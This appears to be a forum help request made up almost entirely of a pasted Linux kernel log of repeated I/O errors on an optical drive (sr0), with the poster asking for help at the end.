sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 879.830558 ] sr 1:0:0:0 : [ sr0 ] [ 879.830563 ] sr 1:0:0:0 : [ sr0 ] [ 879.830570 ] sr 1:0:0:0 : [ sr0 ] [ 879.830578 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 879.830590 ] end_request : i/o error , dev sr0 , sector 64 [ 879.830596 ] buffer i/o error on device sr0 , logical block 8 [ 888.418535 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 888.418541 ] sr 1:0:0:0 : [ sr0 ] [ 888.418546 ] sr 1:0:0:0 : [ sr0 ] [ 888.418552 ] sr 1:0:0:0 : [ sr0 ] [ 888.418558 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 888.418570 ] end_request : i/o error , dev sr0 , sector 64 [ 888.418574 ] buffer i/o error on device sr0 , logical block 8 [ 897.006561 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 897.006566 ] sr 1:0:0:0 : [ sr0 ] [ 897.006572 ] sr 1:0:0:0 : [ sr0 ] [ 897.006578 ] sr 1:0:0:0 : [ sr0 ] [ 897.006585 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 897.006597 ] end_request : i/o error , dev sr0 , sector 0 [ 897.006601 ] buffer i/o error on device sr0 , logical block 0 [ 905.594581 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 905.594586 ] sr 1:0:0:0 : [ sr0 ] [ 905.594591 ] sr 1:0:0:0 : [ sr0 ] [ 905.594597 ] sr 1:0:0:0 : [ sr0 ] [ 905.594602 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 905.594614 ] end_request : i/o error , dev sr0 , sector 0 [ 905.594618 ] buffer i/o error on device sr0 , logical block 0 [ 914.182609 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 914.182615 ] sr 1:0:0:0 : [ sr0 ] [ 914.182620 ] sr 1:0:0:0 : [ sr0 ] [ 914.182625 ] sr 1:0:0:0 : [ sr0 ] [ 914.182631 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 914.182642 ] end_request : i/o error , dev sr0 , sector 0 [ 914.182647 ] buffer i/o error on device sr0 , logical block 0 [ 922.770635 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 922.770640 ] sr 1:0:0:0 : [ sr0 ] [ 922.770645 ] sr 1:0:0:0 : [ sr0 ] [ 922.770650 ] sr 1:0:0:0 : [ sr0 ] [ 922.770656 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 922.770668 ] end_request : i/o error , dev sr0 , sector 0 [ 922.770672 ] buffer i/o error on device sr0 , logical block 0 [ 931.380074 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 931.380079 ] sr 1:0:0:0 : [ sr0 ] [ 931.380083 ] sr 1:0:0:0 : [ sr0 ] [ 931.380089 ] sr 1:0:0:0 : [ sr0 ] [ 931.380095 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 931.380107 ] end_request : i/o error , dev sr0 , sector 0 [ 931.380111 ] buffer i/o error on device sr0 , logical block 0 [ 939.968097 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 939.968102 ] sr 1:0:0:0 : [ sr0 ] [ 939.968107 ] sr 1:0:0:0 : [ sr0 ] [ 939.968113 ] sr 1:0:0:0 : [ sr0 ] [ 939.968119 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 939.968130 ] end_request : i/o error , dev sr0 , sector 16 [ 939.968134 ] buffer i/o error on device sr0 , logical block 2 [ 948.556131 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 948.556136 ] sr 1:0:0:0 : [ sr0 ] [ 948.556141 ] sr 1:0:0:0 : [ sr0 ] [ 948.556147 ] sr 1:0:0:0 : [ sr0 ] [ 948.556153 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 948.556164 ] end_request : i/o error , dev sr0 , sector 0 [ 948.556169 ] buffer i/o error on device sr0 , logical block 0 [ 957.144184 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 957.144190 ] sr 1:0:0:0 : [ sr0 ] [ 957.144195 ] sr 1:0:0:0 : [ sr0 ] [ 957.144201 ] sr 1:0:0:0 : [ sr0 ] [ 957.144209 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 957.144220 ] end_request : i/o error , dev sr0 , sector 0 [ 957.144226 ] buffer i/o error on device sr0 , logical block 0 [ 965.732168 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 965.732173 ] sr 1:0:0:0 : [ sr0 ] [ 965.732177 ] sr 1:0:0:0 : [ sr0 ] [ 965.732183 ] sr 1:0:0:0 : [ sr0 ] [ 965.732190 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 965.732202 ] end_request : i/o error , dev sr0 , sector 0 [ 965.732206 ] buffer i/o error on device sr0 , logical block 0 [ 974.320188 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 974.320192 ] sr 1:0:0:0 : [ sr0 ] [ 974.320197 ] sr 1:0:0:0 : [ sr0 ] [ 974.320203 ] sr 1:0:0:0 : [ sr0 ] [ 974.320209 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 974.320221 ] end_request : i/o error , dev sr0 , sector 0 [ 974.320225 ] buffer i/o error on device sr0 , logical block 0 [ 982.908222 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 982.908227 ] sr 1:0:0:0 : [ sr0 ] [ 982.908232 ] sr 1:0:0:0 : [ sr0 ] [ 982.908239 ] sr 1:0:0:0 : [ sr0 ] [ 982.908245 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 982.908256 ] end_request : i/o error , dev sr0 , sector 0 [ 982.908262 ] buffer i/o error on device sr0 , logical block 0 [ 991.496212 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 991.496217 ] sr 1:0:0:0 : [ sr0 ] [ 991.496222 ] sr 1:0:0:0 : [ sr0 ] [ 991.496227 ] sr 1:0:0:0 : [ sr0 ] [ 991.496234 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 991.496246 ] end_request : i/o error , dev sr0 , sector 0 [ 991.496250 ] buffer i/o error on device sr0 , logical block 0 [ 1000.084220 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1000.084226 ] sr 1:0:0:0 : [ sr0 ] [ 1000.084230 ] sr 1:0:0:0 : [ sr0 ] [ 1000.084237 ] sr 1:0:0:0 : [ sr0 ] [ 1000.084243 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1000.084254 ] end_request : i/o error , dev sr0 , sector 0 [ 1000.084260 ] buffer i/o error on device sr0 , logical block 0 [ 1008.672232 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1008.672237 ] sr 1:0:0:0 : [ sr0 ] [ 1008.672241 ] sr 1:0:0:0 : [ sr0 ] [ 1008.672247 ] sr 1:0:0:0 : [ sr0 ] [ 1008.672253 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1008.672265 ] end_request : i/o error , dev sr0 , sector 0 [ 1008.672269 ] buffer i/o error on device sr0 , logical block 0 [ 1017.260236 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1017.260240 ] sr 1:0:0:0 : [ sr0 ] [ 1017.260245 ] sr 1:0:0:0 : [ sr0 ] [ 1017.260251 ] sr 1:0:0:0 : [ sr0 ] [ 1017.260257 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1017.260268 ] end_request : i/o error , dev sr0 , sector 0 [ 1017.260272 ] buffer i/o error on device sr0 , logical block 0 [ 1025.848243 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1025.848248 ] sr 1:0:0:0 : [ sr0 ] [ 1025.848253 ] sr 1:0:0:0 : [ sr0 ] [ 1025.848259 ] sr 1:0:0:0 : [ sr0 ] [ 1025.848265 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1025.848276 ] end_request : i/o error , dev sr0 , sector 0 [ 1025.848281 ] buffer i/o error on device sr0 , logical block 0 [ 1034.436268 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1034.436273 ] sr 1:0:0:0 : [ sr0 ] [ 1034.436278 ] sr 1:0:0:0 : [ sr0 ] [ 1034.436284 ] sr 1:0:0:0 : [ sr0 ] [ 1034.436290 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1034.436302 ] end_request : i/o error , dev sr0 , sector 0 [ 1034.436306 ] buffer i/o error on device sr0 , logical block 0 [ 1043.024276 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1043.024281 ] sr 1:0:0:0 : [ sr0 ] [ 1043.024285 ] sr 1:0:0:0 : [ sr0 ] [ 1043.024291 ] sr 1:0:0:0 : [ sr0 ] [ 1043.024297 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1043.024308 ] end_request : i/o error , dev sr0 , sector 0 [ 1043.024313 ] buffer i/o error on device sr0 , logical block 0 [ 1051.612285 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1051.612289 ] sr 1:0:0:0 : [ sr0 ] [ 1051.612294 ] sr 1:0:0:0 : [ sr0 ] [ 1051.612299 ] sr 1:0:0:0 : [ sr0 ] [ 1051.612306 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1051.612317 ] end_request : i/o error , dev sr0 , sector 128 [ 1051.612321 ] buffer i/o error on device sr0 , logical block 16 [ 1060.200273 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1060.200278 ] sr 1:0:0:0 : [ sr0 ] [ 1060.200282 ] sr 1:0:0:0 : [ sr0 ] [ 1060.200289 ] sr 1:0:0:0 : [ sr0 ] [ 1060.200295 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1060.200306 ] end_request : i/o error , dev sr0 , sector 128 [ 1060.200311 ] buffer i/o error on device sr0 , logical block 16 [ 1068.788284 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1068.788288 ] sr 1:0:0:0 : [ sr0 ] [ 1068.788293 ] sr 1:0:0:0 : [ sr0 ] [ 1068.788299 ] sr 1:0:0:0 : [ sr0 ] [ 1068.788305 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1068.788316 ] end_request : i/o error , dev sr0 , sector 16 [ 1068.788325 ] buffer i/o error on device sr0 , logical block 2 [ 1077.376314 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1077.376321 ] sr 1:0:0:0 : [ sr0 ] [ 1077.376333 ] sr 1:0:0:0 : [ sr0 ] [ 1077.376339 ] sr 1:0:0:0 : [ sr0 ] [ 1077.376345 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1077.376356 ] end_request : i/o error , dev sr0 , sector 0 [ 1077.376360 ] buffer i/o error on device sr0 , logical block 0 [ 1085.964304 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1085.964310 ] sr 1:0:0:0 : [ sr0 ] [ 1085.964315 ] sr 1:0:0:0 : [ sr0 ] [ 1085.964321 ] sr 1:0:0:0 : [ sr0 ] [ 1085.964328 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1085.964340 ] end_request : i/o error , dev sr0 , sector 0 [ 1085.964345 ] buffer i/o error on device sr0 , logical block 0 [ 1094.552278 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1094.552284 ] sr 1:0:0:0 : [ sr0 ] [ 1094.552289 ] sr 1:0:0:0 : [ sr0 ] [ 1094.552295 ] sr 1:0:0:0 : [ sr0 ] [ 1094.552302 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1094.552313 ] end_request : i/o error , dev sr0 , sector 8 [ 1094.552318 ] buffer i/o error on device sr0 , logical block 1 [ 1103.140271 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1103.140276 ] sr 1:0:0:0 : [ sr0 ] [ 1103.140281 ] sr 1:0:0:0 : [ sr0 ] [ 1103.140286 ] sr 1:0:0:0 : [ sr0 ] [ 1103.140292 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1103.140303 ] end_request : i/o error , dev sr0 , sector 16 [ 1103.140308 ] buffer i/o error on device sr0 , logical block 2 [ 1111.728281 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1111.728286 ] sr 1:0:0:0 : [ sr0 ] [ 1111.728291 ] sr 1:0:0:0 : [ sr0 ] [ 1111.728296 ] sr 1:0:0:0 : [ sr0 ] [ 1111.728303 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1111.728315 ] end_request : i/o error , dev sr0 , sector 0 [ 1111.728319 ] buffer i/o error on device sr0 , logical block 0 [ 1120.316269 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1120.316275 ] sr 1:0:0:0 : [ sr0 ] [ 1120.316280 ] sr 1:0:0:0 : [ sr0 ] [ 1120.316285 ] sr 1:0:0:0 : [ sr0 ] [ 1120.316291 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1120.316302 ] end_request : i/o error , dev sr0 , sector 0 [ 1120.316307 ] buffer i/o error on device sr0 , logical block 0 [ 1128.904289 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1128.904297 ] sr 1:0:0:0 : [ sr0 ] [ 1128.904308 ] sr 1:0:0:0 : [ sr0 ] [ 1128.904314 ] sr 1:0:0:0 : [ sr0 ] [ 1128.904320 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1128.904332 ] end_request : i/o error , dev sr0 , sector 0 [ 1128.904336 ] buffer i/o error on device sr0 , logical block 0 [ 1137.492229 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1137.492234 ] sr 1:0:0:0 : [ sr0 ] [ 1137.492238 ] sr 1:0:0:0 : [ sr0 ] [ 1137.492245 ] sr 1:0:0:0 : [ sr0 ] [ 1137.492251 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1137.492262 ] end_request : i/o error , dev sr0 , sector 0 [ 1137.492267 ] buffer i/o error on device sr0 , logical block 0 [ 1146.080252 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1146.080257 ] sr 1:0:0:0 : [ sr0 ] [ 1146.080261 ] sr 1:0:0:0 : [ sr0 ] [ 1146.080267 ] sr 1:0:0:0 : [ sr0 ] [ 1146.080273 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1146.080285 ] end_request : i/o error , dev sr0 , sector 0 [ 1146.080289 ] buffer i/o error on device sr0 , logical block 0 [ 1154.668235 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1154.668239 ] sr 1:0:0:0 : [ sr0 ] [ 1154.668244 ] sr 1:0:0:0 : [ sr0 ] [ 1154.668250 ] sr 1:0:0:0 : [ sr0 ] [ 1154.668256 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1154.668268 ] end_request : i/o error , dev sr0 , sector 0 [ 1154.668273 ] buffer i/o error on device sr0 , logical block 0 [ 1163.256207 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1163.256213 ] sr 1:0:0:0 : [ sr0 ] [ 1163.256218 ] sr 1:0:0:0 : [ sr0 ] [ 1163.256223 ] sr 1:0:0:0 : [ sr0 ] [ 1163.256229 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1163.256241 ] end_request : i/o error , dev sr0 , sector 8 [ 1163.256245 ] buffer i/o error on device sr0 , logical block 1 [ 1171.844209 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1171.844214 ] sr 1:0:0:0 : [ sr0 ] [ 1171.844219 ] sr 1:0:0:0 : [ sr0 ] [ 1171.844225 ] sr 1:0:0:0 : [ sr0 ] [ 1171.844231 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1171.844243 ] end_request : i/o error , dev sr0 , sector 128 [ 1171.844247 ] buffer i/o error on device sr0 , logical block 16 [ 1180.432176 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1180.432181 ] sr 1:0:0:0 : [ sr0 ] [ 1180.432186 ] sr 1:0:0:0 : [ sr0 ] [ 1180.432192 ] sr 1:0:0:0 : [ sr0 ] [ 1180.432198 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1180.432209 ] end_request : i/o error , dev sr0 , sector 0 [ 1180.432214 ] buffer i/o error on device sr0 , logical block 0 [ 1189.020194 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1189.020207 ] sr 1:0:0:0 : [ sr0 ] [ 1189.020211 ] sr 1:0:0:0 : [ sr0 ] [ 1189.020217 ] sr 1:0:0:0 : [ sr0 ] [ 1189.020223 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1189.020234 ] end_request : i/o error , dev sr0 , sector 0 [ 1189.020238 ] buffer i/o error on device sr0 , logical block 0 [ 1197.608157 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1197.608170 ] sr 1:0:0:0 : [ sr0 ] [ 1197.608175 ] sr 1:0:0:0 : [ sr0 ] [ 1197.608181 ] sr 1:0:0:0 : [ sr0 ] [ 1197.608187 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1197.608199 ] end_request : i/o error , dev sr0 , sector 4096 [ 1197.608203 ] buffer i/o error on device sr0 , logical block 512 [ 1206.196117 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1206.196122 ] sr 1:0:0:0 : [ sr0 ] [ 1206.196127 ] sr 1:0:0:0 : [ sr0 ] [ 1206.196133 ] sr 1:0:0:0 : [ sr0 ] [ 1206.196139 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1206.196151 ] end_request : i/o error , dev sr0 , sector 0 [ 1206.196155 ] buffer i/o error on device sr0 , logical block 0 [ 1214.784092 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1214.784097 ] sr 1:0:0:0 : [ sr0 ] [ 1214.784101 ] sr 1:0:0:0 : [ sr0 ] [ 1214.784108 ] sr 1:0:0:0 : [ sr0 ] [ 1214.784114 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1214.784125 ] end_request : i/o error , dev sr0 , sector 0 [ 1214.784130 ] buffer i/o error on device sr0 , logical block 0 [ 1223.372078 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1223.372083 ] sr 1:0:0:0 : [ sr0 ] [ 1223.372087 ] sr 1:0:0:0 : [ sr0 ] [ 1223.372093 ] sr 1:0:0:0 : [ sr0 ] [ 1223.372100 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1223.372112 ] end_request : i/o error , dev sr0 , sector 0 [ 1223.372116 ] buffer i/o error on device sr0 , logical block 0 [ 1231.960048 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1231.960053 ] sr 1:0:0:0 : [ sr0 ] [ 1231.960058 ] sr 1:0:0:0 : [ sr0 ] [ 1231.960064 ] sr 1:0:0:0 : [ sr0 ] [ 1231.960070 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1231.960081 ] end_request : i/o error , dev sr0 , sector 0 [ 1231.960085 ] buffer i/o error on device sr0 , logical block 0 [ 1240.549983 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1240.549988 ] sr 1:0:0:0 : [ sr0 ] [ 1240.549992 ] sr 1:0:0:0 : [ sr0 ] [ 1240.549998 ] sr 1:0:0:0 : [ sr0 ] [ 1240.550004 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1240.550016 ] end_request : i/o error , dev sr0 , sector 0 [ 1240.550020 ] buffer i/o error on device sr0 , logical block 0 [ 1249.137941 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1249.137948 ] sr 1:0:0:0 : [ sr0 ] [ 1249.137952 ] sr 1:0:0:0 : [ sr0 ] [ 1249.137959 ] sr 1:0:0:0 : [ sr0 ] [ 1249.137965 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1249.137977 ] end_request : i/o error , dev sr0 , sector 0 [ 1249.137981 ] buffer i/o error on device sr0 , logical block 0 [ 1404.773262 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1404.773270 ] sr 1:0:0:0 : [ sr0 ] [ 1404.773278 ] sr 1:0:0:0 : [ sr0 ] [ 1404.773291 ] sr 1:0:0:0 : [ sr0 ] [ 1404.773297 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1404.773308 ] end_request : i/o error , dev sr0 , sector 0 [ 1404.773312 ] buffer i/o error on device sr0 , logical block 0 [ 1404.773320 ] buffer i/o error on device sr0 , logical block 1 [ 1404.773323 ] buffer i/o error on device sr0 , logical block 2 [ 1404.773325 ] buffer i/o error on device sr0 , logical block 3 [ 1413.361334 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1413.361339 ] sr 1:0:0:0 : [ sr0 ] [ 1413.361343 ] sr 1:0:0:0 : [ sr0 ] [ 1413.361349 ] sr 1:0:0:0 : [ sr0 ] [ 1413.361355 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1413.361367 ] end_request : i/o error , dev sr0 , sector 0 [ 1413.361371 ] buffer i/o error on device sr0 , logical block 0 [ 1421.949408 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1421.949412 ] sr 1:0:0:0 : [ sr0 ] [ 1421.949417 ] sr 1:0:0:0 : [ sr0 ] [ 1421.949423 ] sr 1:0:0:0 : [ sr0 ] [ 1421.949429 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1421.949440 ] end_request : i/o error , dev sr0 , sector 0 [ 1421.949445 ] buffer i/o error on device sr0 , logical block 0 [ 1430.537453 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1430.537458 ] sr 1:0:0:0 : [ sr0 ] [ 1430.537463 ] sr 1:0:0:0 : [ sr0 ] [ 1430.537468 ] sr 1:0:0:0 : [ sr0 ] [ 1430.537474 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1430.537486 ] end_request : i/o error , dev sr0 , sector 0 [ 1430.537490 ] buffer i/o error on device sr0 , logical block 0 [ 1439.127436 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1439.127442 ] sr 1:0:0:0 : [ sr0 ] [ 1439.127446 ] sr 1:0:0:0 : [ sr0 ] [ 1439.127452 ] sr 1:0:0:0 : [ sr0 ] [ 1439.127458 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1439.127469 ] end_request : i/o error , dev sr0 , sector 0 [ 1439.127473 ] buffer i/o error on device sr0 , logical block 0 [ 1447.715449 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1447.715454 ] sr 1:0:0:0 : [ sr0 ] [ 1447.715458 ] sr 1:0:0:0 : [ sr0 ] [ 1447.715465 ] sr 1:0:0:0 : [ sr0 ] [ 1447.715471 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1447.715482 ] end_request : i/o error , dev sr0 , sector 0 [ 1447.715486 ] buffer i/o error on device sr0 , logical block 0 [ 1456.303502 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1456.303509 ] sr 1:0:0:0 : [ sr0 ] [ 1456.303521 ] sr 1:0:0:0 : [ sr0 ] [ 1456.303527 ] sr 1:0:0:0 : [ sr0 ] [ 1456.303533 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1456.303544 ] end_request : i/o error , dev sr0 , sector 0 [ 1456.303548 ] buffer i/o error on device sr0 , logical block 0 [ 1464.891481 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1464.891486 ] sr 1:0:0:0 : [ sr0 ] [ 1464.891491 ] sr 1:0:0:0 : [ sr0 ] [ 1464.891497 ] sr 1:0:0:0 : [ sr0 ] [ 1464.891503 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1464.891514 ] end_request : i/o error , dev sr0 , sector 0 [ 1464.891518 ] buffer i/o error on device sr0 , logical block 0 [ 1473.479482 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1473.479486 ] sr 1:0:0:0 : [ sr0 ] [ 1473.479491 ] sr 1:0:0:0 : [ sr0 ] [ 1473.479497 ] sr 1:0:0:0 : [ sr0 ] [ 1473.479503 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1473.479514 ] end_request : i/o error , dev sr0 , sector 0 [ 1473.479519 ] buffer i/o error on device sr0 , logical block 0 [ 1482.067463 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1482.067470 ] sr 1:0:0:0 : [ sr0 ] [ 1482.067478 ] sr 1:0:0:0 : [ sr0 ] [ 1482.067492 ] sr 1:0:0:0 : [ sr0 ] [ 1482.067498 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1482.067509 ] end_request : i/o error , dev sr0 , sector 128 [ 1482.067513 ] buffer i/o error on device sr0 , logical block 16 [ 1490.655460 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1490.655465 ] sr 1:0:0:0 : [ sr0 ] [ 1490.655470 ] sr 1:0:0:0 : [ sr0 ] [ 1490.655476 ] sr 1:0:0:0 : [ sr0 ] [ 1490.655482 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1490.655493 ] end_request : i/o error , dev sr0 , sector 0 [ 1490.655497 ] buffer i/o error on device sr0 , logical block 0 [ 1499.243444 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1499.243451 ] sr 1:0:0:0 : [ sr0 ] [ 1499.243460 ] sr 1:0:0:0 : [ sr0 ] [ 1499.243472 ] sr 1:0:0:0 : [ sr0 ] [ 1499.243479 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1499.243490 ] end_request : i/o error , dev sr0 , sector 0 [ 1499.243494 ] buffer i/o error on device sr0 , logical block 0 [ 1672.795123 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1672.795128 ] sr 1:0:0:0 : [ sr0 ] [ 1672.795134 ] sr 1:0:0:0 : [ sr0 ] [ 1672.795139 ] sr 1:0:0:0 : [ sr0 ] [ 1672.795145 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1672.795156 ] end_request : i/o error , dev sr0 , sector 0 [ 1672.795161 ] buffer i/o error on device sr0 , logical block 0 [ 1681.383144 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1681.383149 ] sr 1:0:0:0 : [ sr0 ] [ 1681.383154 ] sr 1:0:0:0 : [ sr0 ] [ 1681.383159 ] sr 1:0:0:0 : [ sr0 ] [ 1681.383165 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1681.383176 ] end_request : i/o error , dev sr0 , sector 0 [ 1681.383180 ] buffer i/o error on device sr0 , logical block 0 [ 1689.971212 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1689.971217 ] sr 1:0:0:0 : [ sr0 ] [ 1689.971221 ] sr 1:0:0:0 : [ sr0 ] [ 1689.971227 ] sr 1:0:0:0 : [ sr0 ] [ 1689.971233 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1689.971244 ] end_request : i/o error , dev sr0 , sector 0 [ 1689.971248 ] buffer i/o error on device sr0 , logical block 0 [ 1698.559260 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1698.559265 ] sr 1:0:0:0 : [ sr0 ] [ 1698.559270 ] sr 1:0:0:0 : [ sr0 ] [ 1698.559276 ] sr 1:0:0:0 : [ sr0 ] [ 1698.559282 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1698.559293 ] end_request : i/o error , dev sr0 , sector 0 [ 1698.559297 ] buffer i/o error on device sr0 , logical block 0 [ 1707.147279 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1707.147284 ] sr 1:0:0:0 : [ sr0 ] [ 1707.147289 ] sr 1:0:0:0 : [ sr0 ] [ 1707.147295 ] sr 1:0:0:0 : [ sr0 ] [ 1707.147302 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1707.147313 ] end_request : i/o error , dev sr0 , sector 0 [ 1707.147318 ] buffer i/o error on device sr0 , logical block 0 [ 1715.735287 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1715.735293 ] sr 1:0:0:0 : [ sr0 ] [ 1715.735298 ] sr 1:0:0:0 : [ sr0 ] [ 1715.735304 ] sr 1:0:0:0 : [ sr0 ] [ 1715.735311 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1715.735323 ] end_request : i/o error , dev sr0 , sector 0 [ 1715.735327 ] buffer i/o error on device sr0 , logical block 0 [ 1724.323338 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1724.323343 ] sr 1:0:0:0 : [ sr0 ] [ 1724.323348 ] sr 1:0:0:0 : [ sr0 ] [ 1724.323354 ] sr 1:0:0:0 : [ sr0 ] [ 1724.323360 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1724.323371 ] end_request : i/o error , dev sr0 , sector 0 [ 1724.323375 ] buffer i/o error on device sr0 , logical block 0 [ 1732.911352 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1732.911357 ] sr 1:0:0:0 : [ sr0 ] [ 1732.911361 ] sr 1:0:0:0 : [ sr0 ] [ 1732.911368 ] sr 1:0:0:0 : [ sr0 ] [ 1732.911374 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1732.911385 ] end_request : i/o error , dev sr0 , sector 0 [ 1732.911390 ] buffer i/o error on device sr0 , logical block 0 [ 1741.606448 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 1741.606453 ] sr 1:0:0:0 : [ sr0 ] [ 1741.606458 ] sr 1:0:0:0 : [ sr0 ] [ 1741.606464 ] sr 1:0:0:0 : [ sr0 ] [ 1741.606470 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 1741.606481 ] end_request : i/o error , dev sr0 , sector 0 [ 1741.606487 ] buffer i/o error on device sr0 , logical block 0 kindly help me out here friends . thank you so much in advance .
